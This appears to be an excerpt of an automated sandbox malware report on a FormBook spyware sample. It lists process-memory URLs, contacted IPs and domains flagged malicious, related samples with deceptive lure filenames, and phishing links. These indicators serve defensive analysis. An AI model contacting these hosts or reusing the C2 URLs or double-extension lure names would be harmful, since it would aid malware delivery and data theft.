                                          https://static.loopia.se/shared/logo/logo-loopia-white.svgclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchclip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://delivery.consentmanager.netclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://static.loopia.se/shared/style/2022-extra-pages.cssclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://static.loopia.se/responsive/images/iOS-114.pngclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://static.loopia.se/responsive/styles/reset.cssclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.Bfiworkerscomp.comclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://ac.ecosia.org/autocomplete?q=clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://static.loopia.se/responsive/images/iOS-57.pngclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gifclip.exe, 00000009.00000002.3768118603.0000000006368000.00000004.10000000.00040000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.00000000041C8000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bfiworkerscomp.com/Dream_Job_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Btclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.dmtxwuatbz.ccftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3768529485.00000000052AE000.00000040.80000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkinclip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://i3.cdn-image.com/__media__/js/min.js?v2.3clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bfiworkerscomp.com/Discussion_Forums.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Bclip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=clip.exe, 00000009.00000002.3771571702.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          23.251.54.212
                                          		www.anuts.topUnited States
                                          		62468VPSQUANUStrue
                                          172.67.210.102
                                          		www.dmtxwuatbz.ccUnited States
                                          		13335CLOUDFLARENETUStrue
                                          213.145.228.16
                                          		www.sandranoll.comAustria
                                          		25575DOMAINTECHNIKATtrue
                                          194.9.94.85
                                          		www.xn--matfrmn-jxa4m.seSweden
                                          		39570LOOPIASEtrue
                                          5.44.111.162
                                          		www.hprlz.czGermany
                                          		45031PROVIDERBOXIPv4IPv6DUS1DEfalse
                                          217.160.0.106
                                          		www.catherineviskadi.comGermany
                                          		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                          208.91.197.27
                                          		www.bfiworkerscomp.comVirgin Islands (BRITISH)
                                          		40034CONFLUENCE-NETWORK-INCVGtrue
                                          91.195.240.19
                                          		parkingpage.namecheap.comGermany
                                          		47846SEDO-ASDEtrue
                                          194.58.112.174
                                          		www.helpers-lion.onlineRussian Federation
                                          		197695AS-REGRUtrue
                                          199.192.19.19
                                          		www.telwisey.infoUnited States
                                          		22612NAMECHEAP-NETUStrue
                                          43.252.167.188
                                          		www.xn--fhq1c541j0zr.comHong Kong
                                          		38277CLINK-AS-APCommuniLinkInternetLimitedHKtrue

                                          General Information

                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1467718
                                          Start date and time:2024-07-04 16:51:06 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 10m 29s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:16
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:2
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:TOgpmvvWoj.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:4815f332b8be3f9e2b173e71e751f994570fd23b0f7d3f7c519369f909f0b3c0.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@7/5@14/11
                                          EGA Information:
                                          • Successful, ratio: 75%
                                          HCA Information:
                                          • Successful, ratio: 97%
                                          • Number of executed functions: 59
                                          • Number of non-executed functions: 271
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target ftlDDsmJxbqfWuvUNSEx.exe, PID 6932 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: TOgpmvvWoj.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          12:28:39API Interceptor11822899x Sleep call for process: clip.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          23.251.54.212Attendance list.exeGet hashmaliciousFormBookBrowse
                                          • www.anuts.top/li0t/
                                          Payment_Advice.pdf.exeGet hashmaliciousFormBookBrowse
                                          • www.anuts.top/niik/
                                          BL7247596940.pdf.exeGet hashmaliciousFormBookBrowse
                                          • www.anuts.top/niik/?wp=Y4bXb&PRT4=H/YiygX9KITTv7luV6yUPKrN50P+s1tzENv79uR8DwTDmQwOwNUPDlYEBevB1BzVmv2ACSfGFUmX0UJ7u9Bld+nnTqDy3OkaCqYdjJlbok8OnyXr0/DiKgU=
                                          Arrival Notice.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • www.anuts.top/niik/
                                          172.67.210.102Attendance list.exeGet hashmaliciousFormBookBrowse
                                          • www.dmtxwuatbz.cc/lfkn/
                                          213.145.228.16Attendance list.exeGet hashmaliciousFormBookBrowse
                                          • www.sandranoll.com/aroo/
                                          Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                                          • www.sandranoll.com/zg5v/
                                          Swift Message.pdf.exeGet hashmaliciousFormBookBrowse
                                          • www.sandranoll.com/cga5/
                                          1LZvA2cEfV.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • www.sandranoll.com/4bud/
                                          Payment Details- scanslip000002343.exeGet hashmaliciousFormBookBrowse
                                          • www.sandranoll.com/4bud/
                                          DRAFT DOCS RSHA25491003.exeGet hashmaliciousFormBookBrowse
                                          • www.sandranoll.com/4bud/
                                          Payment_Advice.pdf.exeGet hashmaliciousFormBookBrowse
                                          • www.sandranoll.com/niik/
                                          PO.4563.0002_2024.exeGet hashmaliciousFormBookBrowse
                                          • www.sandranoll.com/4bud/
                                          BL7247596940.pdf.exeGet hashmaliciousFormBookBrowse
                                          • www.sandranoll.com/niik/?wp=Y4bXb&PRT4=bOhbf9nA9ANf4gKZ0D/cx2mKLKP5h5S6BzYsYRymqO0Y7ABdmDatfS6UnB5JwDymuRUltFOJ97FMgck4gZZuLOGJ5Y8WdAQExr4HhgBx2rUiFV4bYBTJf60=
                                          Arrival Notice.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • www.sandranoll.com/niik/
                                          194.9.94.85Attendance list.exeGet hashmaliciousFormBookBrowse
                                          • www.xn--matfrmn-jxa4m.se/4hda/
                                          Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                                          • www.xn--matfrmn-jxa4m.se/5m4b/
                                          Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                          • www.torentreprenad.com/r45o/
                                          Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                          • www.torentreprenad.com/r45o/
                                          TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                                          • www.torentreprenad.com/r45o/
                                          ORDER TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                                          • www.torentreprenad.com/r45o/
                                          D7KV2Z73zC.rtfGet hashmaliciousFormBookBrowse
                                          • www.xn--matfrmn-jxa4m.se/ufuh/
                                          Scan Doc.docx.docGet hashmaliciousFormBookBrowse
                                          • www.xn--matfrmn-jxa4m.se/ufuh/
                                          Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                          • www.torentreprenad.com/r45o/
                                          product Inquiry and RFQ ART LTD.docGet hashmaliciousFormBookBrowse
                                          • www.xn--matfrmn-jxa4m.se/ufuh/

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          www.dmtxwuatbz.ccAttendance list.exeGet hashmaliciousFormBookBrowse
                                          • 172.67.210.102
                                          Swift Copy #U00a362,271.03.Pdf.exeGet hashmaliciousFormBookBrowse
                                          • 172.67.210.102
                                          PO-104678522.exeGet hashmaliciousFormBookBrowse
                                          • 172.67.210.102
                                          NEW ORDER-RFQ#10112023Q4.exeGet hashmaliciousFormBookBrowse
                                          • 104.21.45.56
                                          NEW ORDER 75647839384.exeGet hashmaliciousFormBookBrowse
                                          • 104.21.45.56
                                          www.sandranoll.comAttendance list.exeGet hashmaliciousFormBookBrowse
                                          • 213.145.228.16
                                          Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 213.145.228.16
                                          Swift Message.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 213.145.228.16
                                          1LZvA2cEfV.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 213.145.228.16
                                          Payment Details- scanslip000002343.exeGet hashmaliciousFormBookBrowse
                                          • 213.145.228.16
                                          DRAFT DOCS RSHA25491003.exeGet hashmaliciousFormBookBrowse
                                          • 213.145.228.16
                                          Payment_Advice.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 213.145.228.16
                                          PO.4563.0002_2024.exeGet hashmaliciousFormBookBrowse
                                          • 213.145.228.16
                                          BL7247596940.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 213.145.228.16
                                          Arrival Notice.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 213.145.228.16
                                          www.anuts.topAttendance list.exeGet hashmaliciousFormBookBrowse
                                          • 23.251.54.212
                                          2OdHcYtYOMOepjD.exeGet hashmaliciousFormBookBrowse
                                          • 23.251.54.212
                                          Tekstlinie.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 23.251.54.212
                                          Purchase order.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 23.251.54.212
                                          dMY6QiHAIpPPqiV.exeGet hashmaliciousFormBookBrowse
                                          • 23.251.54.212
                                          Purchase order.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 23.251.54.212
                                          UNIVERSITY OF_ SHARJAH- Project FMD20240342_pdf.exeGet hashmaliciousFormBookBrowse
                                          • 23.251.54.212
                                          33BMmt58Bj.exeGet hashmaliciousFormBookBrowse
                                          • 23.251.54.212
                                          Payment_Advice.pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 23.251.54.212
                                          Payment_Advice.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 23.251.54.212
                                          www.xn--matfrmn-jxa4m.seAttendance list.exeGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          D7KV2Z73zC.rtfGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          Scan Doc.docx.docGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          BASF Purchase Order.docGet hashmaliciousFormBookBrowse
                                          • 194.9.94.86
                                          SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exeGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          product Inquiry and RFQ ART LTD.docGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          New Order.docGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          GXu0Ow8T1h.exeGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          GcwoApxt8q.exeGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          www.catherineviskadi.comAttendance list.exeGet hashmaliciousFormBookBrowse
                                          • 217.160.0.106

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          DOMAINTECHNIKATAttendance list.exeGet hashmaliciousFormBookBrowse
                                          • 213.145.228.16
                                          Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 213.145.228.16
                                          Swift Message.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 213.145.228.16
                                          1LZvA2cEfV.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 213.145.228.16
                                          Payment Details- scanslip000002343.exeGet hashmaliciousFormBookBrowse
                                          • 213.145.228.16
                                          DRAFT DOCS RSHA25491003.exeGet hashmaliciousFormBookBrowse
                                          • 213.145.228.16
                                          Payment_Advice.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 213.145.228.16
                                          PO.4563.0002_2024.exeGet hashmaliciousFormBookBrowse
                                          • 213.145.228.16
                                          BL7247596940.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 213.145.228.16
                                          Arrival Notice.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 213.145.228.16
                                          CLOUDFLARENETUS80TeZdsbeA6B6j4.exeGet hashmaliciousFormBookBrowse
                                          • 23.227.38.74
                                          https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.deGet hashmaliciousHTMLPhisherBrowse
                                          • 104.17.25.14
                                          https://vi-822.pages.dev/files/?email=gerold.barkowski@schoenhofer.deGet hashmaliciousHTMLPhisherBrowse
                                          • 188.114.96.3
                                          tYEY1UeurGz0Mjb.exeGet hashmaliciousFormBookBrowse
                                          • 188.114.97.3
                                          https://www.newschoolers.com/click?news=50302&u=http://t.email1.gct.com/r/?id=hfffbb46%2Cc90b147%2Cc90b14f%26jobcode=739-0055%26omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055%26lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D%26cid=gcc_DM212754%26bid=268417862%26rid=1061475%26p1=%41%4E%54oniopneus.com.br/dayo/uevcx/captcha/bWF0cy5hcnRodXJzc29uQHF1aWx0ZXJjaGV2aW90LmNvbQ==$%C3%A3%E2%82%AC%E2%80%9AGet hashmaliciousHTMLPhisherBrowse
                                          • 188.114.96.3
                                          https://t.apemail.net/c/nqkr6vk3kzmvyhqvdmdrwaabbycqmbacainqogyhdmkxs5qvdmkqcvagayhveflk-nqdbwfkcivnrkgyvpf3bkgygamaa4bqedmcagbahdmdrwbqbaibq4aypdmdrwby3cupvkw2wlfob4fi3a4nvsqs3lmnrkyl6ojqbozlsm54gkyyvdmaacdqfaycaeaq3cvpugq2hiqgrqgc6ljdvwvsfkjjveu2skjmuixszlamviwc2dfkukgcai4nfiwczinjfsqyylnmfqryylzmvguspdfpugws3cunugrkckinqaaqcdmkxs5qvdnmuew23dnmuew23dnmuew23dnmuew23dmkqcvagayhveflkGet hashmaliciousHTMLPhisherBrowse
                                          • 104.17.2.184
                                          0NJYTCJYLo.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 104.26.13.205
                                          https://nmg.evlink21.net/Get hashmaliciousUnknownBrowse
                                          • 104.21.80.92
                                          http://kuurza.comGet hashmaliciousUnknownBrowse
                                          • 172.67.41.60
                                          https://email.abad-ca.com/web/webmail4/#midlands.sales@aggregate.comGet hashmaliciousUnknownBrowse
                                          • 188.114.96.3
                                          VPSQUANUSAttendance list.exeGet hashmaliciousFormBookBrowse
                                          • 23.251.54.212
                                          AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                                          • 198.44.170.208
                                          Rn1AkuRExh.elfGet hashmaliciousMiraiBrowse
                                          • 103.252.20.91
                                          c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exeGet hashmaliciousSystemBCBrowse
                                          • 198.44.190.49
                                          tpwinprn.dllGet hashmaliciousGhostRatBrowse
                                          • 156.235.99.47
                                          6z70AuHrHI.dllGet hashmaliciousUnknownBrowse
                                          • 156.235.99.47
                                          PI No. LI-4325.scr.exeGet hashmaliciousFormBookBrowse
                                          • 156.235.111.63
                                          2OdHcYtYOMOepjD.exeGet hashmaliciousFormBookBrowse
                                          • 23.251.54.212
                                          Tekstlinie.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 23.251.54.212
                                          Liquidacion por Factorizacion de Creditos.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 107.151.241.58
                                          PROVIDERBOXIPv4IPv6DUS1DEAttendance list.exeGet hashmaliciousFormBookBrowse
                                          • 5.44.111.162
                                          62c.jsGet hashmaliciousUnknownBrowse
                                          • 5.44.111.28
                                          62c.jsGet hashmaliciousUnknownBrowse
                                          • 5.44.111.28
                                          z8s945rPmZ.exeGet hashmaliciousSystemBCBrowse
                                          • 5.44.111.104
                                          JJUmnnkIxSCyKik.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 93.90.186.43
                                          De0RycaUHH.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                          • 5.44.111.109
                                          27i42a6Qag.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoaderBrowse
                                          • 128.127.69.76
                                          Wp2jiU6tOK.elfGet hashmaliciousMiraiBrowse
                                          • 5.44.126.213
                                          tSPx13a2fq.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 5.44.126.228
                                          Product_Inquiry_#03_2023.exeGet hashmaliciousUnknownBrowse
                                          • 5.44.111.13
                                          LOOPIASEAttendance list.exeGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                          • 194.9.94.86
                                          Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          ORDER TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exeGet hashmaliciousSystemBCBrowse
                                          • 93.188.3.13
                                          D7KV2Z73zC.rtfGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85
                                          Scan Doc.docx.docGet hashmaliciousFormBookBrowse
                                          • 194.9.94.85

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\23802I71

                                          Download File
                                          Process:C:\Windows\SysWOW64\clip.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                          Category:modified
                                          Size (bytes):196608
                                          Entropy (8bit):1.1215420383712111
                                          Encrypted:false
                                          SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
